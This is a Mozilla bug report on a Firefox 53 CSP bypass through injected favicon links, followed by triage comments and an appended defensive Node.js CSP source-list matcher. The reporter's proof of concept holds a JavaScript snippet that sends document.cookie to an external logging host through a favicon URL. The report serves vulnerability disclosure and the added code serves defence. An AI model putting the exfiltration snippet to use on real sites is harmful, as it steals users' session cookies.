Closed Bug 1363031 Opened 2 years ago Closed 2 years ago
Bypass of CSP unsafe-inline mode in Firefox 53
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.36 Safari/537.36

Steps to reproduce:

We can use unprotected vectors to bypass the CSP defense.

PoC: http://server.n0tr00t.com/firefox/ffcsp53.0.2.php

---

CSP:

    header("Content-Security-Policy: default-src 'none' 'unsafe-inline';");

Bypass:

    x = (new Date()).valueOf();
    document.cookie = "csp=" + escape("SECUREKEY@^#2!@#") + ";";
    ffn0t = document.head.appendChild(document.createElement("link"));
    ffn0t.rel = "shortcut icon";
    ffn0t.href = "http://" + x + ".shortcuticon.ff.vqn3j8.ceye.io/?" + document.cookie;

Actual results:

Bypass

Expected results:

Bypass
Group: firefox-core-security → dom-core-security
Component: Untriaged → DOM: Security
Product: Firefox → Core
Of course, the closure of the unsafe-inline mode can also perform bypass code.
favicons are currently not governed by CSP in Firefox. They should be, since they can be specified by the document, but the content is not _in_ the document so it's a bit ambiguous.
Status: UNCONFIRMED → RESOLVED
Closed: 2 years ago
Resolution: --- → DUPLICATE
Duplicate of bug: 1297156
(In reply to Daniel Veditz [:dveditz] from comment #2)
> favicons are currently not governed by CSP in Firefox. They should be, since
> they can be specified by the document, but the content is not _in_ the
> document so it's a bit ambiguous.

Hello, icon == shortcut icon? In my tests the success rate of icon is very low, but shortcut icon triggers stably.
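What governing favicons by CSP would mean for the policy in this report, as an added example that is not part of the bug thread: a simplified Node.js source-list matcher that lists the icon URLs a policy should block. It assumes favicon fetches are image requests covered by img-src with default-src as fallback; the page URL and icon URLs used with it are constructed.

```javascript
// Added example, not code from the bug report. Assumption: favicon fetches are
// image requests, so img-src applies, falling back to default-src.
// Simplification: path parts of host-sources are ignored.

function parsePolicy(header) {
  const directives = new Map();
  for (const part of header.split(';')) {
    const [name, ...sources] = part.trim().split(/\s+/).filter(Boolean);
    // CSP keeps the first occurrence of a directive and ignores repeats.
    if (name && !directives.has(name.toLowerCase())) {
      directives.set(name.toLowerCase(), sources.map((s) => s.toLowerCase()));
    }
  }
  return directives;
}

function sourceMatches(source, url, self) {
  // Quoted keywords ('none', 'unsafe-inline', nonces) never match a URL; only 'self' can.
  if (source.startsWith("'")) return source === "'self'" && url.origin === self.origin;
  if (source === '*') return url.protocol === 'http:' || url.protocol === 'https:';
  if (/^[a-z][a-z0-9+.-]*:$/.test(source)) return url.protocol === source; // scheme-source
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([a-z0-9.-]+)(?::(\d+|\*))?(?:\/.*)?$/.exec(source);
  if (!m) return false;
  const [, scheme, wildcard, host, port] = m;
  // A scheme-less host-source matches the page's own scheme or an upgrade to https.
  const schemeOk = scheme ? url.protocol === scheme + ':'
    : url.protocol === self.protocol || url.protocol === 'https:';
  // "*.example.net" matches subdomains only, not example.net itself.
  const hostOk = wildcard ? url.hostname.endsWith('.' + host) : url.hostname === host;
  const defaultPort = url.protocol === 'https:' ? '443' : '80';
  const portOk = port === '*' ||
    (port ? (url.port || defaultPort) === port : url.port === '');
  return schemeOk && hostOk && portOk;
}

// Returns the icon URLs that the policy should block for a page at pageUrl.
function blockedIcons(header, pageUrl, iconHrefs) {
  const policy = parsePolicy(header);
  const sources = policy.get('img-src') ?? policy.get('default-src');
  if (sources === undefined) return []; // no governing directive: nothing is blocked
  const self = new URL(pageUrl);
  return iconHrefs
    .map((href) => new URL(href, self))
    .filter((url) => !sources.some((s) => sourceMatches(s, url, self)))
    .map((url) => url.href);
}
```

Under the report's policy, `default-src 'none' 'unsafe-inline'`, no source expression matches any URL, so every icon href comes back as blocked, including same-origin ones.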